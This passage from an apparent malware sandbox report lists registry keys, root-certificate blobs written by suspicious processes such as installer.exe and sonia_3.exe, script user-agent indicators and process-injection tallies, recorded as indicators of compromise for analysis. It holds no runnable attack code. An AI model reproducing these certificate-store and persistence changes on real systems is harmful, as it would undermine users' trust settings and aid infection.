Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000adfc30cbbd9cb89797b8d218167161d885234eac41782d2702364f07bec89a9694acd5b3062d3cacb927737eef8426e2be64305c44daf3849885 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0FFE7772-0EE7-40f4-B7D6-3A44BCF0C42A}\ = "PotPlayerLive_Play" dhu7EuXl9V9UCb1xTP4C8z2_.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7CAD4875-0AB6-4178-9E77-7EFB04692A19}\LocalServer32 dhu7EuXl9V9UCb1xTP4C8z2_.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGLockdown MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{62FM2EJ3-714D-A09D-WM25-6QFJ226I1FER}\1 = "2302" rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{74WP1CM3-506M-V62R-WR42-7MQP227Y2YLP} svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 996907429a8ad701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$WordPress MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 6f0b72e19a8ad701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D56E1AC5-92D0-4b2a-A8B2-D3E164F540DD}\ = "PotPlayerMCE_Enqueue" dhu7EuXl9V9UCb1xTP4C8z2_.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 sonia_3.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e sonia_3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 208 PING.EXE -
Script User-Agent 9 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 221 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 249 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 184 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 186 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 195 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 223 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 298 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 305 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 363 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3180 WerFault.exe 3180 WerFault.exe 3180 WerFault.exe 3180 WerFault.exe 3180 WerFault.exe 3180 WerFault.exe 3180 WerFault.exe 3180 WerFault.exe 3180 WerFault.exe 3180 WerFault.exe 3180 WerFault.exe 3180 WerFault.exe 3180 WerFault.exe 3180 WerFault.exe 3180 WerFault.exe 3180 WerFault.exe 3180 WerFault.exe 3180 WerFault.exe 3952 sonia_2.exe 3952 sonia_2.exe 2416 rundll32.exe 2416 rundll32.exe 740 svchost.exe 740 svchost.exe 4620 WerFault.exe 4620 WerFault.exe 4620 WerFault.exe 4620 WerFault.exe 4620 WerFault.exe 4620 WerFault.exe 4620 WerFault.exe 4620 WerFault.exe 4620 WerFault.exe 4620 WerFault.exe 4620 WerFault.exe 4620 WerFault.exe 4620 WerFault.exe 4620 WerFault.exe 4620 WerFault.exe 4620 WerFault.exe 4620 WerFault.exe 4620 WerFault.exe 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2180 Process not Found -
Suspicious behavior: MapViewOfSection 64 IoCs
pid Process 3952 sonia_2.exe 4956 powershell.exe 2400 hsCdANIUKB4wzcSDG7GdlU2e.exe 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 5924 explorer.exe 5924 explorer.exe 5188 explorer.exe 5188 explorer.exe 5640 explorer.exe 5640 explorer.exe 5188 explorer.exe 5188 explorer.exe 5640 explorer.exe 5640 explorer.exe 5924 explorer.exe 5924 explorer.exe 5188 explorer.exe 5188 explorer.exe 5640 explorer.exe 5640 explorer.exe 5924 explorer.exe 5924 explorer.exe 5188 explorer.exe 5188 explorer.exe 5640 explorer.exe 5640 explorer.exe 5924 explorer.exe 5924 explorer.exe 6916 MicrosoftEdgeCP.exe 6916 MicrosoftEdgeCP.exe 5640 explorer.exe 5640 explorer.exe 5924 explorer.exe 5924 explorer.exe 5188 explorer.exe 5188 explorer.exe 6916 MicrosoftEdgeCP.exe 6916 MicrosoftEdgeCP.exe 7136 wgcfjss 6248 iccfjss 5188 explorer.exe 5188 explorer.exe 5924 explorer.exe 5924 explorer.exe 